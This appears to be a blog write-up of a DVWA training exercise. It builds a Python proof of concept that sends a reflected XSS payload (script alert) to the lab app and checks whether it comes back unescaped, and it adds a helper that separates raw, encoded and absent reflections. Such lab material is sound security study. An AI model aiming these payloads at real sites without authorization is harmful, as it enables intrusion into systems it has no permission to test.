• Python DVWA XSS PoC practice


    Reflected XSS, low difficulty

    Request packet

    GET /dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E HTTP/1.1
    Host: 10.9.75.161
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.9.75.161/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3
    Connection: close

    Building the URL

    target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'

    Building the headers

    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    }

    Final PoC

    import requests

    def XSS(url):
        # Same path and URL-encoded payload as in the captured request
        target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'
        # Decoded form of the payload, used to check the response
        payload="<script>alert('xss')</script>"
        headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
        }
        try:
            res=requests.get(url=target,headers=headers,timeout=10)
            print(res.text)
            # Require the complete, unescaped payload in the response; the bare
            # string "xss" can appear for unrelated reasons (e.g. the xss_r path)
            if payload in res.text:
                print('[+]',url,'存在XSS漏洞')  # "XSS vulnerability present"
            else:
                print('[-]',url,'不存在XSS漏洞')  # "no XSS vulnerability"
        except Exception as e:
            print('Error')
            print(e)

    if __name__ == '__main__':
        url=input('请输入目标IP地址:')  # prompt: "Enter the target IP address:"
        XSS('http://'+url)
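
    Added example, not from the original post: a bare `xss` substring test also matches pages that merely link to the `xss_r` path, so this sketch classifies a response by whether the payload comes back intact, HTML-encoded, or not at all. The response bodies and the helper names (`escaped_variants`, `classify_reflection`, `naive_check`, `run_samples`) are constructed for illustration.

```python
import html
from urllib.parse import unquote

# Decoded form of the name= value in the request above.
PAYLOAD = unquote("%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E")

def escaped_variants(payload):
    """HTML-encoded spellings of payload that different encoders emit."""
    base = html.escape(payload, quote=True)        # ' becomes &#x27;
    return {
        base,
        base.replace("&#x27;", "&#039;"),          # PHP htmlspecialchars(ENT_QUOTES)
        base.replace("&#x27;", "&apos;"),
        html.escape(payload, quote=False),         # quotes left untouched
    }

def classify_reflection(body, payload=PAYLOAD):
    """Return 'raw', 'escaped' or 'absent' for how payload shows up in body."""
    if payload in body:
        return "raw"        # markup intact: a browser would run the script
    if any(v in body for v in escaped_variants(payload)):
        return "escaped"    # reflected, but output-encoded into inert text
    return "absent"         # filtered, truncated or never reflected

def naive_check(body):
    """The bare-substring test, kept here for comparison."""
    return "xss" in body

# Constructed response bodies (not captured from a real server). Each one
# includes a navigation link carrying the xss_r path seen in the request.
NAV = '<a href="/dv/vulnerabilities/xss_r/">XSS (Reflected)</a>'
SAMPLES = {
    "unencoded": NAV + "<pre>Hello <script>alert('xss')</script></pre>",
    "encoded": NAV + "<pre>Hello &lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;</pre>",
    "no_input": NAV + "<pre>Hello </pre>",
}

def run_samples():
    """Map each sample name to (naive_check result, classification)."""
    return {name: (naive_check(b), classify_reflection(b)) for name, b in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, verdict) in run_samples().items():
        print(f"{name:10} naive={naive!s:5} classified={verdict}")
```

    Only the `raw` verdict means the input reached the page unencoded; `escaped` is what a response looks like once the output is HTML-encoded.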

    Run result

  • Original article: https://blog.csdn.net/weixin_56537388/article/details/132796219